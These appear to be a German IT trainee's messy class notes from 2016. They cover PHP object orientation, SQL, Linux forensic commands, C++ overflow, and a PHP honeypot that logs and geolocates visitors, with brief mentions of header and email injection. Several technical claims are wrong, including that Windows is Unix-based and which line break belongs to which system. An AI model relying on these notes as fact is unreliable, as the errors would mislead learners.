Oak. Dann Java und den Begriff Interface in die Welt geschmissen. Es gibt mono, damit kann man c# auch unter linux programmieren.

Ab php4 objektorientiert in den Sprachkern .. dann php5 verbessert. Die große Säule polymorphie nicht geschafft. UML = Unified Model Language UML = Sprache, die abstrahiert, in der Sprache, in der ich baue .. java kommt erst in der 2. Runde. Serverparks mit UML modellieren..

UML erlaubt Figuren, wie das ER-Modell .. peter chen auch enwickelt hatte. Kasten = Klasse.. ..nur die notwenigsten Elemente..

Die abstraktion wäre die Klasse

Wiederholen von letzter Woche..

resource_id = hat was mit c++ zu tun, mit Zeigerarithmetik.

22.11.2016 PHP Objektorientiert: Vererbung und Wiederverwendung

Klassenbucheintrag: Vererbung und Wiederverwendung; Redefinition; UML für Vererbung; Konstruktoren bei Vererbung; protected und private; fpdf: Generierung von Pdf Dateien über PHP;Anwenden einer objektorientierten Bibliothek; Redefinition von Header und Footer;

Dazu das Arbeitsblatt: “Klassen, Objekte, Instanzen, Exemplare & Co”

Was ist noch mal UML?? der ganze Kasten links ist eine Klasse Objektkasten Klasse = Kategorie = Bauplan ************** * Dozent * = Klasse ************** ************ * -Nr : int * = Attribute * Antje * * - Name :text * ←------is instance of * * ************** ************ * * = Methoden * * *************

Den Controller kann man nicht mehr putzen... er ist AUCH eine Klasse.

Alle Lebewesen haben gemein, dass sie Sauerstoff brauchen .. sie b ildet die Basisklasse für Säugetiere, Reptil, Pilz, Pflanzen, Vogel Allen Hunden ist gemein, dass sie bellen können. Die Basisklasse ist das Allgemeinste; wenn man zwischen bellen und kläffen unterscheidet, dann ist dies eine Spezialisierung.

Das Objekt ist eine Instanz der Klasse und eine Klasse sollte nach Möglichkeit Attribute neu setzen können.

Vererbung + Wiederverwendung bedeutet, das wäre die Zukunft. Js = Objektvererbung Ein Construktor wird verwendet, damit Flugzeuge nicht abstürzen, oder rosa Autos raus kommen (sehr grob gesagt).

Klasse heißt Datei, pfad, Name. Open-constructor und close-constructor pdf-uebersicht.php :

'; echo''; echo''; echo'

Kunde

'; echo'

Abfahrtszeit

'; echo'

Ziel

'; echo'

PDF

'; echo''; echo''; foreach($daten as $val) { // if(isset($_GET['id'])) { // if($_GET['id']==$val['wer']){ echo''; echo'

'.$val['vorname'].' '. $val['nachname'].'

'; echo'

'.$val['uhrzeit'].'

'; echo'

'.$val['wohin'].'

'; echo'

zur PDF

'; echo''; //} // } } echo''; mysqli_close($connect); ?>

Dazu gehört noch ein anderes php-skript.

Was ist ein Browser: Eine Toolsammlung, Sammlung von vielen Programmen, die miteinand arbeiten!

Er hat einen: HTML-Interpreter CSS-Interpreter JS-Interpreter, den man abrufen kann Bildinterpreter jpg gif png svg interpreter (in modernen) Video-Plugin, Codecs man kann ein plugin für pdf installieren .. amsonsten werden sie zum download angeboten. Pdf = portable document format Sandbox – cookie supercookie → wo sind die eigentlich? webcontainer cookie von firmen, die nicht von amazon ist

Datenbank mit Fremdschlüssel erzeugen:

CREATE TABLE `reise` ( `id` int(11) NOT NULL AUTO_INCREMENT, `wer` int(11) NOT NULL, `wann` varchar(50) NOT NULL, `uhrzeit` varchar(50) DEFAULT NULL, `wohin` varchar(50) DEFAULT NULL, PRIMARY KEY (`id`), FOREIGN KEY (`wer`) REFERENCES `kunde` (`id`) ON DELETE CASCADE ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1;

??

Datenbank wieder auf System überspielen: mysql -p -u root pruef2 < pruefungen.sql

Datenbanken ändern: ALTER TABLE table CHANGE vorname Vorname varchar(99) NOT NULL;

23.11.2016: Forensik, c++ und Nimm-Spiel

Klassenbucheintrag: Computer-Forensik; Gerichtsbarkeit; Einbruch erkennen, Beweise sichern, Analysieren, Wieder Herstellen, Dokumentieren; C++: Datentypen, negative Zahlen, Bereichsüberlauf; Nimm-Spiel (MuenzSpiel).

TCPDF kann auch pdf's und ist sogar besser. pdf lib kostet viel geld und kann nicht mehr polymorphie morgen

Heute: c++-Tag ..bei der blonden frau bibliothek c++11 – Buch. Bücher: lieber leihen.

Auch Uni-Bibliotheken.. .

Google kommt in die hackeschen Höfe .. im Frühjahr sind sie da, mit einer ganz großen Dependanz!

Wozu codeblocks, g++ in der Konsole benutzen, unter Debian Linux. Forensik:

Im Regelfall sagen die Richter, dass Sachen, die manipulierbar sind (wie Computer), nicht gerichtbar sind.

Aber, man kann trotzdem was tun, um Hacker-Angriffe zu beweisen.

Beweise sollen gerichtbar sein. Angemeldete Benutzer, die festplatte, ram( alles als liste), laufende Prozesse, geöffnete netzwerkverbindungen, aktuelle Systemzeit.

1. Admin hat immer eine kamera dabei, die nicht digital ist (weil man digis verändern kann). 2. Blatt papier – checksum muss drauf, und minimal zwei leute müssen unterschreiben. 3. jemanden neben sich (vier Augen-Prinzip). 4. Netzwerkstecker ziehen 5. Rechner NICHT runter fahren 6. Angriff erkennen 7. Beweise sichern 8. Angriff analysieren 9. Liste (Dokumentation) → man muss penibel Buch führen über jeden kleinsten Befehl, der ausgeführt worden ist, welche Verschlüsselung(hash-Algorithmus) 10. Ist die Forensik abgeschlossen, System komplett neu installieren. Wirklich forensik abgeschlossen?

Und immer in der Schublade haben: “Hiermit bestätigt der Chef, dass der Netzwerkstecker nicht gezogen werden darf. Damit kann man sicht rechtfertigen.

IDS = Intrudersysteme.

Die Checksum ist ein Hash. Hash = Zahl mit Algorithmus .. aber was sonst?

Man kann den Inhalt des RAM's mit dem dd-Befehl sichern!

Peristente (flüchtige, RAM) und nicht flüchtige daten(Festplatten)

USB-Stick, wo wichtige programme, die ich zum Untersuchung brauche .. links sollten statisch sein, damit das autostart nicht alles verändern kann, oder so ähnlich statisch linken .. mal googlen. einloggen muss er, aber alles, was du sonst tust, ist immer nur auf dem Stick!

Progmem-info gilt vorm richter ganz gut.

Mit Arp kann man gucken, welches Interface dran ist. Fdisk pstools datei immer schön hashen. Haschen? skript werfen auf die konsole, dann wird er alles loggen, was sich in die konsole passiert.

Was ist ein hash? Antje erklärte es nadine, ich hatte es aber gar nicht verstanden. “Ein Hashtag ( Neutrum [1], zusammengesetzt aus engl. hash für das Schriftzeichen Doppelkreuz [„#“] und engl. tag für Markierung) ist ein Schlagwort in Benutzung, als solches gekennzeichnet durch den Hinweis auf die Existenz einer Definition.”

Oder?

Ein Hash: sha512, oder sha-2 .. kann man mit dem salt-algorithmus verstärken m5-Algorithmus. In eine Richtung wird es verschlüsselt, man kann es nicht zurückführen.

“Eine Hash-Funktion ist eine mathematische Funktion, die eine beliebig große Menge an Eingabewerten möglichst gleichmäßig auf eine eingeschränkte Ausgabemenge abbildet.” Beliebig .. gleichmäßig .. auf eine augabemenge.

Checksum prüfen Wenn man ein programm runter lädt, um zu gucken, ob es jemand kaputt gemacht hat.

Lesen von Logfiles = Standard für den Serveradmin .. Programm Perl soll die Logfile- Sammlung vereinfachen. – festplatte: persistent. Ram: flüchtig. _

Befehle der Forensik man soll sich mit seinem System auskennen.

Um zu sehen, was im Hauptspeicher ist.. cat /proc/meminfo nochmal: was ist cat? cat /proc/1/maps

Cat = gebe ich eine datei aus in die Konsole cat ist ursprünglich zum Zusammenfügen von Dateien gedacht (von concatenate = verketten, verknüpfen). mit: cat /proc/1/maps hat man eine Datei, wo heap, stack usw. Drin steht 7ffc58add000-7ffc58afe000 rw-p 00000000 00:00 0 [stack] ls = list (listet alle Elemente auf) ls steht für list und zeigt den Inhalt eines Verzeichnisses bzw. Ordners an. Damit ist es einer der am häufigsten verwendeten Befehle auf der Kommandozeile. ps = prozesse processes liefert eine Momentaufnahme der laufenden Prozesse. Wenn eine ständige Aktualisierung der Prozessliste gewünscht ist, so ist top zu verwenden. ps -A = alle Prozesse prozesse killen mit kill 777 meminfo liegt im unterordner proc fdisk -l (auch abfotografieren lassen) fdisk (für fixed disk) ist ein Kommandozeilen-Programm[1] zur Partitionierung von Datenträgern mit Legacy-MBR und seiner Master-Partitionstabelle (MPT). who (Loginversuche) The who command prints information about all users who are currently logged in. netstat netstat ist ein Diagnose-Werkzeug, mit dem man verschiedene Informationen über den Status der Netzwerkschnittstelle(n) in Erfahrung bringen kann. arp = was ist das noch mal? arp manipulates or displays the kernel's IPv4 network neighbour cache. It can add entries to the table, delete one, or display the current content. Really?

ARP stands for Address Resolution Protocol, which is used to find the address of a network neighbor for a given IPv4 address.

Ifconfig ifconfig ist ein Kommandozeilenprogramm unter Unix, das zur Konfiguration und Steuerung von IP- Netzwerkschnittstellen dient. Der Name steht für „interface configurator“. lsof (es kann sein dass der hacker gerade eine datei offen hat) date lsof steht für list open files und ist ein Hilfsprogramm, welches Informationen über geöffnete Dateien liefert.

Für Windows: sysinternal (man ein externes tool basteln .. sitzung, port) netstat last = wann der Rechner das letzte Mal runter gefahren wurde..

– wir haben mindestens 2 Sticks in der tasche, und einen dritten, ein unix, weil Windows auch auf unix basiert.

.. etwas ist sau schwer .. den angriff analysieren. Backupserver .. wenn ich den rein tue, ist der hacker sofort wieder drinne, also den nicht gleich rein hängen, nach einem Hack.

Ich mounte dann die festplatte, die ich mit dd rüber geschoben hatte .. wenn ich im lesbar, nicht schreibbar mounte, suche ich nach.. die versteckt sind. Dateien?

Systemdateien verändert? Erstpüren man kann raus finden, welche Datei vor kurzem geändert worden ist.

Wer auf dem server ist, ist kein skriptkiddy mehr, sondern leute mit trojaner, die was haben wollen, von unserer Firma.

Ls -ltc .. manpages? Ls -ltk ..diese letzten zugriff nach Strings untersuchen, die der Hacker hinterlassen haben könnte.

Protokolldateien, welche gibt es? Löschen könnte er die, gut. Veräppeln und neu schreiben kann er auch.

Erfolglose Anmeldeversuche.

Virus werden nicht mit virenscanner entfernt, sondern wir machens neu! Backaps haben, um wieder reinzuspielen SPIELEN!

Zum Schluß der Forensik sollte man eine Dokumentation machen.. ..welche Motivation hatte der Täter? – sachen die unter php germacht wurden unter c++ programmieren

– c++ neues projekt machen .. dem kann man mehrere zufügen makefile bauen codeblocks: neues Projekt -> dann konsole-application -> go -< yes -> next -> c++ -> titel -> borlander GNU/GCC Compiler, beide checkboxen an -> finish

#include using namespace std; // Raum Standard int main() // anfang des Lebens { cout << "bla" << and1; return0;

// rot: verboten } sobald ich auf die 32767 komme, bin ich danach in den negativen Bereich. Das brachte die Ariane zum Absturz.

Aufgabe: Volumen des Kegels dynamisch berechnet..

#include using namespace std; // Raum Standard int main() // anfang des Lebens { unsigned short int x = 65533; // cout << "bla" << and1; return0;

// rot: verboten, nicht auf debugger klicken (unter windows) }

// negatives konzept umkippt //65535 = binärbereich hier sobald ich auf die 32767 komme, bin ich mit der nächsten Stelle im negativem Bereich.

Das war der Grund, wieso die Ariane abstürzen musste? Also ich weiss, dass der INT der Ariane 4 Byte (32 bit), die Bodenstation aber nur schlappe 2 Byte hatte und das ?c++? der Bodenstation nicht geupdatet war. Aber, wieso von einem negativen Konzept gesprochen wurde, hatte ich nicht verstanden, die Antje erklärte. Also: 2 Byte (16 Bit) bietet 65535 Möglichkeiten .. Oder 65534? Dann ist die Ariane5 (v88) abgestürzt, weil der Datentyp INT der Bodenstation nur 2 byte hatte, anstelle von 4.

Bereichsüberlauf. Bodenstation hatte ein altes DOS.

Die Steuereinheit war redundant, jedoch wurde auf beiden Systemen die gleiche fehlerhafte Software betrieben.

Da die SRI nicht die neuesten Rechner waren, war dieser Wert nicht gegen einen Überlauf geschützt, wenn er von einer Fliesskommazahl in eine 16 Bit Ganzzahl umgewandelt wurde. Bei Ariane 4 war das kein Problem, denn diese hob gemächlich ab, die Ariane 5 beschleunigte aber 5 mal schneller als die Ariane 4! Bei Ariane 4 konnte dieser Wert niemals den Bereich einer 16 Bit Zahl verlassen, bei Ariane 5 dagegen schon. 37 Sekunden nach dem Start kommt es dann zur Katastrophe: Der BH Wert ist zu groß für eine 16 Bit Zahl, es kommt zu einem Überlauf im SRI, der daraufhin die Arbeit einstellt und Statusdaten an den Bordcomputer sendet und auf Anweisungen wartet.

(Das ist in etwa auch das, was Antje vor zwei Wochen auch sagte .. dann ging sie genauer ein und das ist total interessant)

Das könnte diesen Arithmetischen Überlauf erklären:

11111111 (a) + 00000010 (b) ------100000001 (Ergebnis) Die vordere Eins, das neunte Bit, ist nicht in den 8 Bit des gewählten Datentyps enthalten. Betrachtet man nur diese letzten 8 Bit, so erhält man 00000001, also 1 und nicht 257. Selbst wenn die Zahlenwerte bei der Übersetzung des Programmcodes schon feststehen, ignorieren manche C-Compiler diese Überläufe, was zu falschen Ergebnissen führt. Daher sollte der Datentyp immer ausreichend groß gewählt werden. unsigned char a = 255; unsigned char b = 2; unsigned char Ergebnis = a + b;

Aber, was mich verwirrt: sobald ich auf die 32767 (01111111) komme, bin ich danach im negativem Bereich? Bei -1? 11111111 oder?

Läuft hier was mit 8 bit über? Der Char, vielleicht und wieso der char und nicht der int?

Antje sagte, dass wenn 32767 erreicht sind, es plötzlich -32767 wird und dann schrittweise positiv wird.. Mit char und int geht das. c++ mit codeblocks nutzen: neues projekt machen .. dem kann man mehrer zufügen makefile bauen codeblocks: neues Projekt -> dann konsole-application -> go -< yes -> next -> c++ -> titel -> borlander GNU/GCC Compiler, beide checkboxen an -> finish c++ - Code in der Konsole ausgeben:

Datei in c++ compilieren und ausführen: Im Verzeichnis sein:

1. g++ -o bla c_zeichenketten.cpp 2. ./bla oder: g++ c_ascii.cpp -o c_ascii ./c_ascii --

Ungefähr 3.140.000 Ergebnisse (0,36 Sekunden) Suchergebnisse Multithreading – Wikipedia https://de.wikipedia.org/wiki/Multithreading Multithreading (auch Nebenläufigkeit, Mehrsträngigkeit oder Mehrfädigkeit genannt) bezeichnet in der Informatik das gleichzeitige Abarbeiten mehrerer Threads ...

– gibt allen ascii-code aus .. will ich unbedingt haben !! dieses 4 4 sollst du nur in den bereich, der in der anderen auch passt float ist ungenau und sachen werden zusammen gedupft, wenn man was rein packen will. double ist doppelt so groß wie float

Tip von Mathias: Windows für den Stick, aber ohne grafische Benutzeroberfläche: windows pe (eher für Fernwartung gedacht) .. kann mit meiner bestehende windows-lizenz verknüpft werden .. remote = ssh möglich, aber auf Windows-Basis!

Nach zeichenketten in binärdateien suchen: https://de.wikipedia.org/wiki/Nim-Spiel

..

IT-Forensiker werden bei Cyber-Attacken wie Phishing, Scamming oder Hacking aktiv. Phishing: Auf einer gefälschten Website Daten klauen.

Zitat: “Bei einem Phishing hilft das "Opfer" aktiv mit, indem es den Zugang ermöglicht und dabei fahrlässig handelt. Ein Hack passiert ohne Wissen und Beteiligung des Opfers. In einem Fall bekommt der Datendieb den Schlüssel ausgehändigt (Phishing), im anderen handelt es sich um einen Einbruch (Hacking).”

«IT-Forensiker arbeiten zum Beispiel in Ermittlungsbehörden, Ministerien oder in IT-Sicherheitsabteilungen von großen Unternehmen», erklärt York Yannikos vom Center for Advanced Security Research Darmstadt (CASED) an der Technischen Universität Darmstadt.

Man kann digitale Forensik sechs Semester zusätzlich studieren + ein Jahr Berufserfahrung in Informatik || poliz. Strafverfolgung. Jurakenntnisse. ..oder..

Debian Wie erkenne ich, ob hardware bluetooth unterstützt? Debian bluetooth aktivieren? Man kann Bluetooth über die Energieverwaltung aktivieren(Debian), aber unterstützt die Hardware Bluetooth?

Was ist ein Interface?

24.11.2016 Die dritte Regel der Objektorientierung(Polymorphie) mit Antje Osten

Klassenbucheintrag: Objektorientierte Programmierung: Poplymorphie: abstrakte Klassen und Interfaces; Testen in PHP, Annotation des Typs, Interfaces. nächstes Jahr: UML richtig doll lernen .. die Anwendungsentwickler .. was malen und was steht schon drin.

Antje musste in der Prüfung Quelltext schreiben anwendungsentwickler müssen sowieso java können c++ ist open the brain und java für die wirkliche Welt.

Pflichten und Lastenheft, Wasserfallmodell, spiral .. irgendwas. Googlen!!

Wasserfallmodell: “Das Wasserfallmodell ist ein sequenzielles Vorgehensmodell, das die Entwicklung anhand aufeinanderfolgender Phasen organisiert.” Aber das war nicht der Ursprungstext, den ich hier eingefügt hatte.

Agilen Sachen innerhalb der Programmierung muss man wachen.

Was ist auf einem serverseitigen script die schleife? Schleife ist das hin und her zwischen webserver und client Session .. zahl mitschleppt über ein hiddenfeld .. . oder cookie auf den client setzen.

Statisch oder dynamisch verlinkt (u forensik) betriebssystem auf stick in Forensik. monat: exe, die das spiel kann..

Heute: Abstraktion

Kapseln und verbergen ← Schnittstelle: Stromrein, stromraus: getter und setter: erste und kleinste idee der schnittstelle

C mit klassen wurde um sprachelemente erweitert: vererbung(ohne polymorphismus)

Konstruktoren, Destruktoren

Funktionen

Friend-Deklaration

Typüberprüfung wurde ab 1983 zu c++. ++ = Inkrementoperator Hinzu kamen: virtuelle Funktionen

überladen Von funktionen, überl. Von Operatoren Referenzen Konstanten veränd. Freispeicherverwaltung kommentare mit //hghj.

1985 c++ 2.0 abstrakte Klassen, Mehrfachvererbung, stat und konst Elementfunk schlüsselwort protected dann ansi c++.

Fatal error: Class Pinguin contains 1 abstract method and must therefore be declared abstract or implement the remaining methods (Vogel::fliege) damit die abstrakte klasse in der neuen Klasse einen Körper kriegt.

Nach der Pause: Dritte Schnittstelle: Objekte unter einer Eigenschaft miteinander verbinden

Mausable .. warum hatte antje Osten vor der großen Pause über mausable gesprochen Eine Adresse mit einem Umlaut - www.rechtsanwältin-melcher.de - ein internationalisierter Domainname. Mittels Punycode werden die Nicht-ASCII-Zeichen aus dem Namen entfernt und am Ende des Namens ein daraus abgeleiteter ASCII-String hinzugefügt, in dem die Position und Art des Unicode-Zeichens kodiert ist.

Das ganze objektorientiete PHP-Konstrukt mit der Polymorphie mündete in dieser Index.php :

//$vera = new Drossel(); $vera = new Pinguin("pinguin.png"); dnaVogel($vera);

$dora = new Drossel("drossel.jpg"); dnaVogel($dora);

$doria = new Drossel("drossel2.jpeg"); → catch the recipe and make it to an object. The point is I can make a many of them. The object have values instes, if I have 3 drossel's, then I have 3 sets of values. We can't put them together. One black, one red, other blue .. dnaVogel($doria); → its a function I ve wrote somewhere

$max = new Drossel("drossel3.jpeg"); dnaVogel($max);

$flugi = new Flugzeug("f1.jpg"); schnittstelle($flugi);

$peter = new Pinguin("pinguin2.jpg"); schnittstelle($peter); } $cornelia = new Amsel(); dnaVogel($cornelia); include("include/fuss.php");

//function schnittstelle (vogel $v) // neue basisklasse .. man kann auch grßmutter und enkel verbinden ?> Man kann auch kapseln und verbergen. = 1. Säule Vererben = 2. Säule Polymorphie = 3. Säule

Stirbt die Karte mit dem Spieler, ist dies eine Aggregation. Has-a beziehung ?? Aber wenn die Süßigkeiten mit dem netten Typ sterben, eine Komposition ??

Vierte Säule der objektorientierten Programmierung: Intend = Absicht. Der gemeine Vogel (Basisklasse) ist nur eine Idee. Aber wer oder was er ist, muss man entscheiden.

UML ist dafür da, das mit Menschen im Team Software planen. Vor 2000 gab es UML noch nicht und man hatte Wolken gemacht.

Wenn alle Adobe-Produkte mit der *.dll – Bibliothek verlint sind, dann ist es dynamisch verlinkt. Das ist anfälliger für Hacking, insbesondere wenn es ein Inspizierungs-Stick ist, mit dem man einen verseuchten Rechner untersuchen will. Ls, ps selber übersetzen und flag setzen , damit es statisch ist.

25.11.2016 Netzwerke, Firewall mit Hr. Rüdiger

Fritzbox: Fireall-Regeln problematisch. Werden vom Provider konfiguriert.

Bei Routern ab 20.000 Euro darf man die Firewall-Regeln selber konfigurieren. Hr. Rüdiger zeigte uns eine Firewall-Tabelle, wie sie gesetzt wird, um den Traffic des Routers mit zu schneiden.

1. Gibt es eine firewall-routing-tabelle ?

Hr. rüdiger erklärte mir, dass um den Router rum die Firewall ist und mitschneidet, in einer tabelle, was rein geht und was schhädlich ist raus filtert. .. mit in and out.. . Prüfungsrelevant !! er will mit uns DMZ angucken..

Es gibt auch hardware-firewall, geht rein und raus ?????????????? was bzw. Wo ist ein gateway? - cat .bash_history zeigt immer die ganze History an, egal ob root oder user.

Youtube-Download: Wie? Antwort: convert2mp3.net - Online Video converter - Youtube, Dailymotion ... Nadja sagte: convert2mp3.net/ Videos von YouTube, Dailymotion, Vevo, Clipfish und Myvideo online in MP3 und MP4 und

Garbage collector ist, wenn zwischen Stack(des Prozessors) und heep(vom Ram) das Betriebssystem arbeitet bzw. das Betriebssystem im Heep MB's ablegt, die nicht gebraucht werden. Normalerweise werden sie nach einer gewissen Zeit gelöscht, aber weil Programme die Daten noch benötigen könnten, passt der Garbage collector auf, dass Teile nicht gelöscht werden, die von Programmen noch gebraucht werden. Pekka: Clear the memory

Antje fragen: Wie kommt man dem Plugin entgegen, mit dem Firefox die Rechner schnüffelt, zusammen mit Google, vielleicht. - Außerdem wollte ich mir von der hackers lounge am freitag erklären lassen, wieso ich unter dem lexar- Debian einen Drucker installieren konnte, mit dem sandisk-debian aber nicht?

https://wiki.ubuntuusers.de/Systeminformationen_ermitteln/

Wie man schnell eine Übersicht aus dem Computer im Textdokument speichert: hwinfo --short | cat > /home/max/Dokumente/x.txt

Informationen zu Hersteller, Produkt, Version und Fähigkeiten des Mainboards: dmidecode -t0 -t1

Alle Infos zum Prozessor (außer volt/ampere-stärke). cat /proc/cpuinfo

Bluetooth kann man über Energie/Leistung starten. http://www.gutefrage.net/frage/cpu-und-mainboard-energieverbrauch

Gibt es irgend einen Befehl, der anzeigt, unter welcher Spannung/Stromstärke die Hardware läuft?

Der Computer: Wie viel Spannung hat.. ..das Mainboard, in der Regel? Der RAM? Der Prozessor? Die Netzwerkkarte? Die Grafikkarte (z.B. Nvidia Gforce 730)? Wieviel Spannung maximal verträgt ein Desktop-PC, oder Laptop?

28.11.2016 Honeypot

Klassenbucheintrag: “Servervariablen; fsockopen; Projekt Honeypot, Weiterführung Honeypot mit Datenbank“.

.. Honeypot. Was braucht man? IP und man muss rein fallen. 1. ip 2. wann 3. parsen der Usereingaben 4. Browserkennung (Fingerprint verhindern?)

.. da kriegt man ganz genau mit, wer zu identifizieren ist. ..man kann die browserkennung verändern.

Website bauen, die so aus sieht, als ob man einsteigen kann. Etwa die Blumenwiese?

Es gibt wordpress und jeder mensch weiß, dass wp immer wp-admin hat.

Man kann das nach bauen, mit User-Eingaben und Passwort.

Bruteforce = Er probiert alle durch.

Captcha werden von der ihk abgefragt. Irgendwann konnten Bildauslesemaschinen komplizierte Dinge parsen.

Honeypot mit ingo installieren.-> sollten wir mal.

O'connor .. das Hochkommata hat was mit hacken zu tun. Skriptkiddy hilft man mit \`.

Antje macht jetzt mit uns die Browserkennung. .. das verändern der Daten?

5. woher kommt er denn (der Angriff) her? Über die IP herausfinden: woher? Json kann gut sein, bis vor das Haus. Sogar die Koordinaten kann man nehmen. Über Karte von Openstreetmap, weil von google zu nehmen, ist ein bisschen frech.

6. wo kam der Hacker eigentlich hier? Der Referer. Das kann man verschleiern, bei host zu host. Aber, wenn man DAU-unterwegs ist, geht das nicht. DümmsterAnzunehmenderUser.

Ifconfig heute: 192.168.22.203

Was ist ein Protokoll? Eine Aufzeichnung über den Ablauf eines Verfahrens?

Protokolle sind im RequestForComments notiert, wie man sie gefälligst einhalten muss.

Was muss ich tun? 1. POST-Request 127.0.0.1 Http: 1.1 zeilenumbruch \r\n ← muss sein. \r = für linux. \n = für Windows.

2. Pfad, wo ich hinmöchte. Host: /mit_antje/woche4 \r\n

Dann beginne ich zu hacken

3. Referer: wenn ich den kopf des request selber baue, kann ich bösen code setzen.

Content-type wir wollen die ganzen Anfragen von javascript umgehen mitgeben: Die Länge vom content. Byteanzahl.

Connection: close \r\nEmail-Injection als Angriffvektor; Projektarbeit Dann kann man dahinter Daten senden.

Postdaten senden mit einem 'und'.

Wenn man software produziert, muss man wissen, wie der Request selber geschrieben wird, im RFC.

Wir machen Post-Daten zu Host ??

Brauchen: Log-Datei 2. post-to-host über die console.

Which php ← zeigt an, wo die php- ist, wo es parst, nach fehler root@deb-saiyajin:/usr/bin# php -f /var/www/html/mit_antje_woche4_tag1/post.php

mit dem socket-script das schreipt in das log.txt – Datei.

Ist es jetzt ein Protokoll-Header, das ist der http-Header.

Und wo ist die Socket-Funktion? Fsockopen

Fsockopen: “Initialisiert eine Socket-Verbindung zu der in hostname angegebenen Ressource.” initialisiert = startet, fährt hoch, ladet das betriebssystem in den speicher Socket-Verbindung = ip und port hostname = “Der Hostname (auch Sitename) ist die eindeutige Bezeichnung eines Rechners in einem Netzwerk.” resource = “PTR (kurz für ‚Pointer‘) Resource Records ordnen im Domain Name System einer gegebenen IP-Adresse einen oder mehrere Hostname(s) zu.”

Das ist alles Bestandteil des Honeypots.

Die post_to_host.php tippt die log.php an, damit die das logftile.txt schreibt.

Ich könnte ja eine online-Nachhilfe machen .. eine berater-Plattfdorm, oder so ähnlich, wo jabber nicht mehr ausreicht. log.php könnte auch in die db schreiben. Die posttohost kann auch auf einem server anderes land liegen.

Was zurückgeht, will ich auch fangen, echoausgaben fangen.

Sie (die posttohost?) denkt post to host ist ein browser. Damit es funktioniert, brauchts einen richtigen Kopf.

Wir surfen die post_to_host an, in amiland.

Die post_to_host schreibt mit log.php ein log in Berlin,

Der Request Richtung Amiland wird dann abgeschnorchelt. http://freegeoip.net/json/212.42.226.18 Antwort: {"ip":"212.42.226.18","country_code":"DE","country_name":"Germany","region_code":"BE","region_name ":"Land Berlin","city":"Berlin","zip_code":"10317","time_zone":"Europe/Berlin","latitude":52.5155,"longitude":13.4 062,"metro_code":0} ich möchte speichern:

Das Land, die Stadt, die latitude und die longitude plattitude it, timestamp

Wir sollen tabelle anlagen mit primary key. Alle 4 varchar 16 Spalten, die ordentlich besamt werden.

CREATE TABLE `honey` ( `id` int(11) NOT NULL AUTO_INCREMENT, `ip` varchar(32) NOT NULL, `User_Agent` varchar(100) NOT NULL, `Encoding` varchar(50) NOT NULL, `Accept` varchar(100) NOT NULL, `Language` varchar(25) NOT NULL, `Referer` varchar(100) NOT NULL, `Charset` varchar(25) NOT NULL, `Daten` varchar(255) NOT NULL, `Host` varchar(100) NOT NULL, `Uri` varchar(100) NOT NULL, `Land` varchar(50) NOT NULL, `Stadt` varchar(50) DEFAULT NULL, `latitude` varchar(7) DEFAULT NULL, `longitude` varchar(7) DEFAULT NULL, `timestamp` varchar(50) DEFAULT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=latin1; ich sollte meine Musikwunsch - Eingabemaske nicht so anfällig für jedes Neu-Laden der Seite machen! unter pruef2.php könnte es eine Lösung geben, wo es heißt: If ('fgfd'=''), wo er Leereinträge zurückweist. Tip von Christian: Elk stack = gutes analysetool für größere Server.

Die gesamte js-Welt benutzt json (ist sprache) deutschland-tabelle ist fett .. immer gezippt rüber zu geben. oder mit einem cronjob???

Timestamp einfügen .. wie fügt man ihn ein ??

"CREATE TABLE `created` (`id` int(11) NOT NULL AUTO_INCREMENT PRIMARY KEY,`ipnr` char(15) NOT NULL,`created` TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,`os` enum('linux','win','mac','unknown') NOT NULL DEFAULT 'unknown',`websrv` enum('y','n','unknown') NOT NULL DEFAULT 'unknown')" header kann viel mehr als umleiten, header kann auch Köpfe setzen

php-anfrage ohne browser: cd /usr/bin php -f /var/www/html/mit_antje_woche4_tag1/post_to_host.php

https://schroeffu.ch/2016/08/debian-8-jessie-php-7-neben-php-5-installieren/

Json: “JSON (JavaScript Object Notation) ist ein schlankes Datenaustauschformat, das für Menschen einfach zu lesen und zu schreiben und für Maschinen einfach zu parsen (Analysieren von Datenstrukturen) und zu generieren ist. Es basierd auf einer Untermenge der JavaScript Programmiersprache, Standard ECMA-262 dritte Edition - Dezember 1999.”

29.11.2016 Honeypot mit Löschfunktion und GD- Bibliothek mit Antje Osten

Weil ich die Abfrage in PDO machte, musste auch die Löschfunktion mit Francescos Hilfe in PDO geschrieben werden. Dann musste ich die gb-bibliothek nachinstallieren, weil mein php7 sie nicht hatte. Die gb-Bibliothek ermöglichte das erste Herantasten an die Captchas.

Hier machten wir einen grafischen blauen Button, wo “Max” drin steht.

// Spannen der Leinwand $image = imagecreate($breite,$hoehe);

// Grundierung der Leinwand: Erste farbe ist automatisch die Grundfarbe $grund = imagecolorallocate($image, 100,255,255); //RGB $rot = imagecolorallocate($image, 255,0,0); $schwarz = imagecolorallocate($image, 0,0,0); imagefilledrectangle($image, 0+5,0+5,$breite-5,$hoehe-5,$rot-5); imagestring($image, 7,10,8,"MAX", $schwarz);

// baut die Bibliothek einen geeigneten Kopf header("Content-type: image/png"); imagepng($image); imagedestroy($image); ?>

Zu den drei Säulen der OOP UML dazu basteln (wird kommen).

30.11. Captchas mit Antje Osten

Klassenbucheintrag: “Captchas mit Session; Honeypot mit Karte; Email-Injection als Angriffvektor; Projektarbeit“

Wo der Hahn dann in den Rasen gesetzt wird.

Email-Injection? kvm ist besser als openvz. Kvm = linuxvirtualisierungsschicht.

Antje: hat keine Didaktik für Javascript: Didaktik: Was vordiktieren?

Mpt-Protokoll: js mit apache verheiraten.

Iframe. Regex = spezielle Sprache.

Man kann das Bild verschleiern, damit es mit Flecken übersäht ist.

In c++ random immer mit der startwertmaschine zusammen bauen.

Ein iframe kann eine fremde Seite einladen

Die Box .. mapnick .. geht von open source weg.

Htmlentities: man kann damit sonderzeichen in html einfügen

Linus Torwalds:

“1991 begann Linus Torvalds in Helsinki (Finnland) mit der Entwicklung einer Terminal-Emulation, um unter anderem seinen eigenen Computer besser zu verstehen.” So arbeitet z. B. Andrew Morton im Auftrag von Google am Linux-Kernel network intrusion detechted system = Eindringungsaufspürsystem, Angrifferkennungssystem

1.12. Gelerntes der letzten Wochen festigen von Jan Hill

Kann ich zu 16.8.2016 ergänzen:

Jan half mir, eine Datenbankabfrage, die sich mit jedem Refresh wiederholt, zu stoppen. Ich änderte meine MySql, damit es immer nur einen Eintrag gibt, mit Unique Key:

